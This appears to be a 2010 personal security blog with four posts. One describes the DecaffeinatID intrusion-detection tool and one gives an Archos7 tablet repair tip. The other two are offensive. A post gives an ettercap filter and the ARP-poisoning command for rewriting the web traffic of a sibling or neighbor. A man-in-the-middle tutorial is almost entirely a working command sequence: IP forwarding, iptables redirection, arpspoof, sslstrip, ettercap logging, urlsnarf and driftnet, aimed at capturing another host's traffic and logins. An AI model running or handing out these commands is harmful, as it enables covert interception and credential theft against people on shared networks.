Exploit-DB updates

Tuesday, December 7, 2010

IronGeek's DecaffeinatID

Well, I've been playing around a bit with a Windows VM that acts as a honeypot/IDS for my network, which I can remotely monitor with my Archos7 via VNC. One of the apps I've come across is "DecaffeinatID", which is a very simple IDS/ARP watcher. I've never heard of it before and found it quite a nice addition to my arsenal, so I figured I would spread the info. Here's a little bit of info about it, taken from IronGeek.

This project started because I (IronGeek) wanted a simple ARP Watch like application for Windows. In a short matter of time, feature creep set in. DecaffeinatID is a simple little app that acts as an Intrusion Detection System (more of a log watcher really) to notify the user whenever fellow users at their local WiFi hotspot/LAN are up to the kind of "reindeer games" that often happen at coffee shops and hacker cons. It's not meant to be a replacement for something more feature rich (but complicated) like Snort. DecaffeinatID watches the Windows logs for three main things and pops up a message in the Windows Systray when it sees any of the following:

New or changed ARP table entries
Think of this as a poor man's ARPWatch for Windows. The IDS gives a special alert whenever it sees the MAC address of the IP gateway change.

New events in security log
This will let you know about attempted and successful logins, assuming you have set up auditing for such things in your local security settings.

New events in the firewall log
DecaffeinatID will read your Windows firewall log (if you have one) and list events

You can find more info here
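
A minimal sketch of the ARP-watching check described above, added here as an example and not DecaffeinatID's own code: it diffs two snapshots of Windows `arp -a` output and raises the special gateway-change alert. The duplicate-MAC check goes beyond what the post lists; the function names, addresses and sample tables are constructed.

```python
import re

# One entry line of Windows `arp -a` output: IP, hyphenated MAC, entry type.
ENTRY = re.compile(
    r"^\s*(\d+\.\d+\.\d+\.\d+)\s+((?:[0-9a-f]{2}-){5}[0-9a-f]{2})\s+(\w+)", re.I)

def parse_arp(text):
    """Return {ip: mac} for the dynamic entries in `arp -a` output."""
    table = {}
    for line in text.splitlines():
        m = ENTRY.match(line)
        if m and m.group(3).lower() == "dynamic":
            table[m.group(1)] = m.group(2).lower()
    return table

def diff_arp(old, new, gateway):
    """Compare two snapshots; return a list of (severity, message) alerts."""
    alerts = []
    for ip, mac in sorted(new.items()):
        if ip not in old:
            alerts.append(("info", f"new entry {ip} -> {mac}"))
        elif old[ip] != mac:
            sev = "critical" if ip == gateway else "warning"
            alerts.append((sev, f"{ip} changed {old[ip]} -> {mac}"))
    # One MAC answering for several IPs is typical of a poisoned ARP cache.
    by_mac = {}
    for ip, mac in new.items():
        by_mac.setdefault(mac, []).append(ip)
    for mac, ips in sorted(by_mac.items()):
        if len(ips) > 1:
            alerts.append(("warning", f"{mac} claimed by {', '.join(sorted(ips))}"))
    return alerts

# Constructed sample snapshots (not captured from a real network).
BEFORE = """\
Interface: 192.168.1.20 --- 0xb
  Internet Address      Physical Address      Type
  192.168.1.1           00-11-22-33-44-55     dynamic
  192.168.1.9           66-77-88-99-aa-bb     dynamic
  192.168.1.255         ff-ff-ff-ff-ff-ff     static
"""
AFTER = """\
  Internet Address      Physical Address      Type
  192.168.1.1           66-77-88-99-AA-BB     dynamic
  192.168.1.9           66-77-88-99-aa-bb     dynamic
  192.168.1.15          cc-dd-ee-ff-00-11     dynamic
"""
```

Calling `diff_arp(parse_arp(BEFORE), parse_arp(AFTER), "192.168.1.1")` yields a critical alert for the gateway, an info alert for the new host, and a warning that one MAC now answers for two addresses.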

Thursday, December 2, 2010

Ettercap Porn Filter

Ever get tired of your little brother or your perverted neighbor watching porn and wasting perfectly good bandwidth on nonsense? Well, here's a fun solution to that. Below is an ettercap filter I tossed together to play around with. To create an ettercap filter, you first have to create a new file to begin scripting. In this case it will be "hak.filter". Once you have your desired filter scripted, you can then compile it using etterfilter, and then it's ready for use.

Below is an example filter for people to play with and get an idea of how they work. What it does is quite obvious: it changes the word porn to a link saying "You Need Help", which takes them to "www.no-porn.com", a site for porn addiction. It also changes a few other words.

You can find the script here:

http://pastebin.com/L7PCPNap

To compile it, simply make a new file called hak.filter, then once you have your desired script ready, use this command in a terminal:

etterfilter hak.filter -o name.ef

At this point the filter is ready for use; to use it, simply add "-F name.ef" when running ettercap.

Example usage: ettercap -TM arp:remote // // -F name.ef -i wlan0

Friday, November 26, 2010

Man In The Middle tutorial - SSLStrip and Arp Poisoning.

Linux Distro
Tools used
  • Ettercap
  • SSLStrip
  • Dsniff suite (URLSnarf)
  • Driftnet
  • Arpspoof
  • fping
  • nano
Commands
  • nano /etc/etter.conf
  • fping -a -g 192.168.1.9 192.168.1.1 -s >hosts
  • sslstrip -a -k -f
  • iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-ports 10000
  • echo "1" > /proc/sys/net/ipv4/ip_forward
  • arpspoof -i wlan0 -t 192.168.1.9 192.168.1.1
  • ettercap -Tq -L etterlogs -i wlan0
  • urlsnarf -vvv -i wlan0
  • driftnet -v -i wlan0 

Tuesday, November 23, 2010

A possible fix for hopeless Archos7s that won't stop restarting

Well, I recently had an Archos7 that would not stop resetting when I booted it. The damn thing would reboot the second I touched the screen, and in some cases before it could even boot. I'm not sure if this will solve others' problems, but I simply put a new ROM (Update.img) on an SD card, and the moment it booted (took a few tries) I slipped the card in and quickly hit the Update button before it had the chance to reboot, and just like that, it worked perfectly.